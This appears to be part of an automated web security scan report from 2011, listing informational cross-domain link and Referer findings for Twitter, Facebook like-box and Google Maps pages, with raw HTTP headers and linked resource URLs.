<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1181491002/x03/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1438515215/x04/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1568546716/x05/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

12.9. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/?q=cloudscan

The response contains the following links to other domains:

http://a0.twimg.com/profile_images/1124040897/at-twitter_normal.png
http://a0.twimg.com/profile_images/1128418096/jerry_can_normal.jpg
http://a0.twimg.com/profile_images/1359177515/avatarme_normal.jpg
http://a0.twimg.com/profile_images/267298914/n700068668_5523_normal.jpg
http://a0.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif
http://a0.twimg.com/profile_images/51857279/merlin_icon_184-1_normal.png
http://a1.twimg.com/profile_images/1133209200/heath_normal.jpg
http://a1.twimg.com/profile_images/1197409570/dslogo2_normal.png
http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg
http://a1.twimg.com/profile_images/130500759/73x73_wired_normal.jpg
http://a1.twimg.com/profile_images/1316311238/FT-square-72_normal.png
http://a1.twimg.com/profile_images/1390070643/JoMLBProfileBread1BEST_normal.jpg
http://a1.twimg.com/profile_images/230326317/clanBomb80x80_normal.png
http://a1.twimg.com/profile_images/345370384/20090730_ramussen_rdax_150x117_normal.jpg
http://a1.twimg.com/profile_images/442074010/Harlan_normal.jpg
http://a1.twimg.com/profile_images/565244113/edited_twit_normal.jpg
http://a1.twimg.com/profile_images/73350787/SenateFloor_normal.jpg
http://a1.twimg.com/profile_images/74105303/thehill_normal.png
http://a1.twimg.com/profile_images/782905483/logofreetabnoslogan45mm_normal.jpg
http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css
http://a2.twimg.com/profile_images/1207013292/725a7cb3-12f0-41c4-9775-99a8fd1784c4_normal.png
http://a2.twimg.com/profile_images/1288338673/bOf_normal.jpg
http://a2.twimg.com/profile_images/1320377184/edited_normal.jpg
http://a2.twimg.com/profile_images/1362208843/for_twitter_5-20-11_normal.jpg
http://a2.twimg.com/profile_images/1395294125/sports_a_normal.png
http://a2.twimg.com/profile_images/421377161/azizlittletwitter_normal.jpg
http://a2.twimg.com/profile_images/445550654/twitter_logo_normal.png
http://a3.twimg.com/profile_images/1230252841/DMLogoTM-carton-icon-facebook-twitter_normal.jpg
http://a3.twimg.com/profile_images/1254292772/presssec_twitter_large_normal.jpg
http://a3.twimg.com/profile_images/307387871/Health_normal.bmp
http://a3.twimg.com/profile_images/420586010/SETI_logo_CMYK_normal.jpg

Request

GET /?q=cloudscan HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCLGgPSExAToHaWQiJTk5YTFkNGYxZTM3ZTcz%250ANTcxNmIxMjZmNzQ0M2Y4NWE3Ogxjc3JmX2lkIiVjYWE2ZmYxYzNjZjAxZTE1%250ANjJhZDg3ODIwZGYwYmUxOCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--f0f51b0587c8f9d20257809023786f0390d24b19; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.1.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:06:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522795-94080-62477
ETag: "326c50fac38d248889240e8355daa3cc"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:06:35 GMT
X-Runtime: 0.13037
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 1e8653f9d3cb1d319de2bb12de9a68f7df16673f
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWE0MmQ5ZTMyODll%250AN2YzNzk1YTQwNTU0ZDEyNDI0Mjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYjkzN2M5%250AMGZhOWIxZTBjNGZmMTg0MDAyZDU1NjZjZjE6D2NyZWF0ZWRfYXRsKwhiTDwh%250AMQE%253D--96ec00d2df88e8ffa6efe2dfd5bcd5bc4bf834d2; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50504
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...
<link href="/phoenix/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<link rel="stylesheet" href="http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css" type="text/css" media="screen" />

<noscript>
...[SNIP]...
<a data-user-id="1344951" href="/#!/wired" title="Wired"><img src="http://a1.twimg.com/profile_images/130500759/73x73_wired_normal.jpg" alt="Wired" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14348594" href="/#!/hodgman" title="hodgman"><img src="http://a2.twimg.com/profile_images/1362208843/for_twitter_5-20-11_normal.jpg" alt="hodgman" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="24752484" href="/#!/OpenGov" title="Open Government"><img src="http://a0.twimg.com/profile_images/282596621/600px-US-OfficeOfScienceAndTechnologyPolicy-Seal_normal.gif" alt="Open Government" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="6480682" href="/#!/azizansari" title="Aziz Ansari"><img src="http://a2.twimg.com/profile_images/421377161/azizlittletwitter_normal.jpg" alt="Aziz Ansari" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="11347122" href="/#!/GavinNewsom" title="Gavin Newsom"><img src="http://a2.twimg.com/profile_images/1320377184/edited_normal.jpg" alt="Gavin Newsom" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="1769551" href="/#!/nytimeshealth" title="NYTimes Health"><img src="http://a3.twimg.com/profile_images/307387871/Health_normal.bmp" alt="NYTimes Health" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18949452" href="/#!/FT" title="Financial Times"><img src="http://a1.twimg.com/profile_images/1316311238/FT-square-72_normal.png" alt="Financial Times" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="113420831" href="/#!/PressSec" title="Jay Carney (EOP)"><img src="http://a3.twimg.com/profile_images/1254292772/presssec_twitter_large_normal.jpg" alt="Jay Carney (EOP)" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="13201312" href="/#!/WWF" title="WWF"><img src="http://a1.twimg.com/profile_images/782905483/logofreetabnoslogan45mm_normal.jpg" alt="WWF" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="62442994" href="/#!/AndersFoghR" title="AndersFogh Rasmussen"><img src="http://a1.twimg.com/profile_images/345370384/20090730_ramussen_rdax_150x117_normal.jpg" alt="AndersFogh Rasmussen" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15668745" href="/#!/stokereport" title="stokereport"><img src="http://a1.twimg.com/profile_images/230326317/clanBomb80x80_normal.png" alt="stokereport" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14165865" href="/#!/dosomething" title="DoSomething.org"><img src="http://a1.twimg.com/profile_images/1197409570/dslogo2_normal.png" alt="DoSomething.org" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15446126" href="/#!/designmilk" title="Design Milk"><img src="http://a3.twimg.com/profile_images/1230252841/DMLogoTM-carton-icon-facebook-twitter_normal.jpg" alt="Design Milk" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="9855382" href="/#!/SenateFloor" title="U.S. Senate Floor"><img src="http://a1.twimg.com/profile_images/73350787/SenateFloor_normal.jpg" alt="U.S. Senate Floor" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18392906" href="/#!/BoF" title="Business of Fashion"><img src="http://a2.twimg.com/profile_images/1288338673/bOf_normal.jpg" alt="Business of Fashion" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="34554134" href="/#!/SETIInstitute" title="The SETI Institute"><img src="http://a3.twimg.com/profile_images/420586010/SETI_logo_CMYK_normal.jpg" alt="The SETI Institute" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16727535" href="/#!/lancearmstrong" title="Lance Armstrong"><img src="http://a2.twimg.com/profile_images/1207013292/725a7cb3-12f0-41c4-9775-99a8fd1784c4_normal.png" alt="Lance Armstrong" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="62591681" href="/#!/EdwardNorton" title="Edward Norton"><img src="http://a1.twimg.com/profile_images/442074010/Harlan_normal.jpg" alt="Edward Norton" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15316815" href="/#!/sarahdessen" title="sarahdessen"><img src="http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg" alt="sarahdessen" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="44039298" href="/#!/sethmeyers21" title="Seth Meyers"><img src="http://a0.twimg.com/profile_images/267298914/n700068668_5523_normal.jpg" alt="Seth Meyers" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="783214" href="/#!/twitter" title="Twitter"><img src="http://a0.twimg.com/profile_images/1124040897/at-twitter_normal.png" alt="Twitter" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="73181712" href="/#!/TheJusticeDept" title="The Justice Dept"><img src="http://a2.twimg.com/profile_images/445550654/twitter_logo_normal.png" alt="The Justice Dept" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="1917731" href="/#!/thehill" title="The Hill"><img src="http://a1.twimg.com/profile_images/74105303/thehill_normal.png" alt="The Hill" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="93957809" href="/#!/ericschmidt" title="Eric Schmidt"><img src="http://a1.twimg.com/profile_images/565244113/edited_twit_normal.jpg" alt="Eric Schmidt" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="26784273" href="/#!/charitywater" title="charity: water"><img src="http://a0.twimg.com/profile_images/1128418096/jerry_can_normal.jpg" alt="charity: water" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="749863" href="/#!/hotdogsladies" title="Merlin Mann"><img src="http://a0.twimg.com/profile_images/51857279/merlin_icon_184-1_normal.png" alt="Merlin Mann" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14128602" href="/#!/momfluential" title="Ciaran Blumenfeld"><img src="http://a0.twimg.com/profile_images/1359177515/avatarme_normal.jpg" alt="Ciaran Blumenfeld" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="188490841" href="/#!/HeathBell21" title="Heath Bell"><img src="http://a1.twimg.com/profile_images/1133209200/heath_normal.jpg" alt="Heath Bell" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15130854" href="/#!/MyLastBite" title="Jo Maxwell Stougaard"><img src="http://a1.twimg.com/profile_images/1390070643/JoMLBProfileBread1BEST_normal.jpg" alt="Jo Maxwell Stougaard" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="300392950" href="/#!/TwitterSports" title="Twitter Sports"><img src="http://a2.twimg.com/profile_images/1395294125/sports_a_normal.png" alt="Twitter Sports" height="48" width="48" /></a>
...[SNIP]...

12.10. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/?q=cloudscan

The response contains the following links to other domains:

http://a0.twimg.com/profile_images/104775516/flwbooks100x100_normal.png
http://a0.twimg.com/profile_images/1160001056/logo_normal.jpg
http://a0.twimg.com/profile_images/1168342829/Screen_shot_2010-11-15_at_9.08.26_PM_normal.png
http://a0.twimg.com/profile_images/118308448/squareGettyWordmark_normal.jpg
http://a0.twimg.com/profile_images/1207063871/2010-06-11-at-10-26-58-twitter1_normal.jpg
http://a0.twimg.com/profile_images/1325337735/icon_normal.png
http://a0.twimg.com/profile_images/1334758081/Rolling_Stone_08.02.11_0057_normal.jpg
http://a0.twimg.com/profile_images/1376696406/diplo_fallin_normal.jpg
http://a0.twimg.com/profile_images/1386049513/Screenshot_2011-06-07_at_11.49.55_AM_normal.png
http://a0.twimg.com/profile_images/1437975427/ASG_twitter_icon_normal.jpg
http://a0.twimg.com/profile_images/543636661/SciFriBadge73_normal.png
http://a1.twimg.com/profile_images/100678623/photo_somaly_normal.jpg
http://a1.twimg.com/profile_images/1237858543/TC_twitter_profile_pic_copy_normal.png
http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg
http://a1.twimg.com/profile_images/1380169114/logo_twitter_bigger_normal.jpg
http://a1.twimg.com/profile_images/1417379062/WomensHealthJulyAug11_normal.jpg
http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg
http://a1.twimg.com/profile_images/665883933/gallery-msg-126445197571-3_2_normal.jpg
http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css
http://a2.twimg.com/profile_images/1237784101/care_logo_normal.JPG
http://a2.twimg.com/profile_images/1289898062/image_normal.jpg
http://a2.twimg.com/profile_images/1339309616/100x100-transparent-tailfin-v2_normal.gif
http://a2.twimg.com/profile_images/1364557668/image_normal.jpg
http://a2.twimg.com/profile_images/1380913332/TB_White_Jacket_normal.JPG
http://a3.twimg.com/profile_images/1090941746/KismetatMITMuseum_normal.jpg
http://a3.twimg.com/profile_images/1241243134/DFH_logo_twitter_normal.JPG
http://a3.twimg.com/profile_images/192122918/profile_pic_normal.jpg
http://a3.twimg.com/profile_images/340068086/laughing_squid_logo_normal.jpg
http://a3.twimg.com/profile_images/456912196/Picture_1_normal.png
http://a3.twimg.com/profile_images/568525297/Picture_normal.png
http://a3.twimg.com/profile_images/86820236/TwitterLogo_normal.jpg

Request

GET /?q=cloudscan HTTP/1.1
Host: twitter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Cookie: k=173.193.214.243.1310522711741462; guest_id=v1%3A131052271223855296; _twitter_sess=BAh7CjoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwixoD0hMQE6%250AB2lkIiU5OWExZDRmMWUzN2U3MzU3MTZiMTI2Zjc0NDNmODVhNzoMY3NyZl9p%250AZCIlY2FhNmZmMWMzY2YwMWUxNTYyYWQ4NzgyMGRmMGJlMTgiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA%253D--50bfdb52e14835d473c0b9478dd99f22193f449a; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1509851687.1310522719.1310522719.1310522719.1; __utmb=43838368.2.10.1310522719; __utmc=43838368; __utmz=43838368.1310522719.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:05:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1310522738-96358-4043
ETag: "3d44201a6509a8eae4ebf3beb837dac5"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 13 Jul 2011 02:05:38 GMT
X-Runtime: 0.10444
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8b760d1227a4579d66ff8cec6629b19f5c785733
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50556
Connection: close

<!DOCTYPE html>
<html >
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<script type="text/javascript" charset="utf-8">

...[SNIP]...
<link href="/phoenix/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<link rel="stylesheet" href="http://a2.twimg.com/a/1310499774/phoenix/css/phoenix.bundle.css" type="text/css" media="screen" />

<noscript>
...[SNIP]...
<a data-user-id="16568227" href="/#!/GettyMuseum" title="J. Paul Getty Museum"><img src="http://a0.twimg.com/profile_images/118308448/squareGettyWordmark_normal.jpg" alt="J. Paul Getty Museum" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="24907662" href="/#!/SomalyMam" title="Somaly Mam"><img src="http://a1.twimg.com/profile_images/100678623/photo_somaly_normal.jpg" alt="Somaly Mam" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="3459051" href="/#!/Greenpeace" title="Greenpeace"><img src="http://a1.twimg.com/profile_images/1380169114/logo_twitter_bigger_normal.jpg" alt="Greenpeace" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="2172" href="/#!/laughingsquid" title="Laughing Squid"><img src="http://a3.twimg.com/profile_images/340068086/laughing_squid_logo_normal.jpg" alt="Laughing Squid" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="36823" href="/#!/anildash" title="Anil Dash"><img src="http://a2.twimg.com/profile_images/1364557668/image_normal.jpg" alt="Anil Dash" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16834046" href="/#!/CARE" title="CAREUSA (care.org)"><img src="http://a2.twimg.com/profile_images/1237784101/care_logo_normal.JPG" alt="CAREUSA (care.org)" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14939981" href="/#!/questlove" title="Questo of The Roots"><img src="http://a0.twimg.com/profile_images/1168342829/Screen_shot_2010-11-15_at_9.08.26_PM_normal.png" alt="Questo of The Roots" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="3475" href="/#!/davemorin" title="Dave Morin"><img src="http://a0.twimg.com/profile_images/1386049513/Screenshot_2011-06-07_at_11.49.55_AM_normal.png" alt="Dave Morin" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="53153263" href="/#!/tyrabanks" title="Tyra Banks"><img src="http://a2.twimg.com/profile_images/1380913332/TB_White_Jacket_normal.JPG" alt="Tyra Banks" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18479513" href="/#!/MLB" title="MLB"><img src="http://a0.twimg.com/profile_images/1437975427/ASG_twitter_icon_normal.jpg" alt="MLB" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="25087685" href="/#!/WomensHealthMag" title="Women's Health Mag"><img src="http://a1.twimg.com/profile_images/1417379062/WomensHealthJulyAug11_normal.jpg" alt="Women's Health Mag" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16817883" href="/#!/scifri" title="Science Friday"><img src="http://a0.twimg.com/profile_images/543636661/SciFriBadge73_normal.png" alt="Science Friday" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="10697882" href="/#!/robhoward" title="Rob Howard"><img src="http://a3.twimg.com/profile_images/456912196/Picture_1_normal.png" alt="Rob Howard" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="23922282" href="/#!/dannymasterson" title="danny masterson"><img src="http://a1.twimg.com/profile_images/665883933/gallery-msg-126445197571-3_2_normal.jpg" alt="danny masterson" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14353392" href="/#!/NoReservations" title="Anthony Bourdain"><img src="http://a2.twimg.com/profile_images/1289898062/image_normal.jpg" alt="Anthony Bourdain" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="12101862" href="/#!/VirginAmerica" title="Virgin America"><img src="http://a2.twimg.com/profile_images/1339309616/100x100-transparent-tailfin-v2_normal.gif" alt="Virgin America" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18713254" href="/#!/simonpegg" title="Simon Pegg"><img src="http://a0.twimg.com/profile_images/1334758081/Rolling_Stone_08.02.11_0057_normal.jpg" alt="Simon Pegg" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16303106" href="/#!/StephenAtHome" title="Stephen Colbert"><img src="http://a3.twimg.com/profile_images/568525297/Picture_normal.png" alt="Stephen Colbert" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18552281" href="/#!/netsbasketball" title="netsbasketball"><img src="http://a0.twimg.com/profile_images/1325337735/icon_normal.png" alt="netsbasketball" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14437914" href="/#!/NewsHour" title="NewsHour"><img src="http://a0.twimg.com/profile_images/1160001056/logo_normal.jpg" alt="NewsHour" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14363353" href="/#!/travelchannel" title="TravelChannel"><img src="http://a1.twimg.com/profile_images/1237858543/TC_twitter_profile_pic_copy_normal.png" alt="TravelChannel" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="16298447" href="/#!/MITMuseum" title="MIT Museum"><img src="http://a3.twimg.com/profile_images/1090941746/KismetatMITMuseum_normal.jpg" alt="MIT Museum" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="22061737" href="/#!/AiANews" title="Art in America"><img src="http://a3.twimg.com/profile_images/86820236/TwitterLogo_normal.jpg" alt="Art in America" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="17174309" href="/#!/diplo" title="d..p..o"><img src="http://a0.twimg.com/profile_images/1376696406/diplo_fallin_normal.jpg" alt="d..p..o" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="18170896" href="/#!/sanjayguptaCNN" title="Dr. Sanjay Gupta"><img src="http://a3.twimg.com/profile_images/192122918/profile_pic_normal.jpg" alt="Dr. Sanjay Gupta" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="14515734" href="/#!/drdrew" title="Dr. Drew"><img src="http://a1.twimg.com/profile_images/458966890/twitterProfilePhoto_normal.jpg" alt="Dr. Drew" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="21898041" href="/#!/Disc_Health" title="Discovery Health"><img src="http://a3.twimg.com/profile_images/1241243134/DFH_logo_twitter_normal.JPG" alt="Discovery Health" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="17596014" href="/#!/flwbooks" title="Flashlight Worthy"><img src="http://a0.twimg.com/profile_images/104775516/flwbooks100x100_normal.png" alt="Flashlight Worthy" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="7713202" href="/#!/SpeakerBoehner" title="Speaker John Boehner"><img src="http://a0.twimg.com/profile_images/1207063871/2010-06-11-at-10-26-58-twitter1_normal.jpg" alt="Speaker John Boehner" height="48" width="48" /></a>
...[SNIP]...
<a data-user-id="15316815" href="/#!/sarahdessen" title="sarahdessen"><img src="http://a1.twimg.com/profile_images/1282997489/WhatHappenedtoGoodbyesmall_normal.jpg" alt="sarahdessen" height="48" width="48" /></a>
...[SNIP]...

12.11. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/23301_286893159420_2873_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

Request

GET /plugins/likebox.php?id=286893159420&width=250&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/delaware-gov/id444422872
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; locale=en_US; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

12.12. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/276877_100484820802_650394_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/OWWAkKnpuow.js
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js
http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/kBiKV12z46R.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/rK9hU7iYtfp.js

Request

Response

12.13. http://www.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=488+State+Road,+Suite+1+Plymouth,+MA+02360&sll=37.0625,-95.677068&sspn=51.708931,74.267578&ie=UTF8&hq=&hnear=488+State+Rd,+Plymouth,+Massachusetts+02360&ll=42.208176,-70.883789&spn=1.017206,1.213989&z=8&output=embed

The response contains the following links to other domains:

http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png
http://maps.gstatic.com/mapfiles/poweredby.png
http://maps.gstatic.com/mapfiles/smc.png
http://maps.gstatic.com/mapfiles/transparent.png

Request

GET /maps?f=q&source=s_q&hl=en&geocode=&q=488+State+Road,+Suite+1+Plymouth,+MA+02360&sll=37.0625,-95.677068&sspn=51.708931,74.267578&ie=UTF8&hq=&hnear=488+State+Rd,+Plymouth,+Massachusetts+02360&ll=42.208176,-70.883789&spn=1.017206,1.213989&z=8&output=embed HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.bi2technologies.com/contact-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
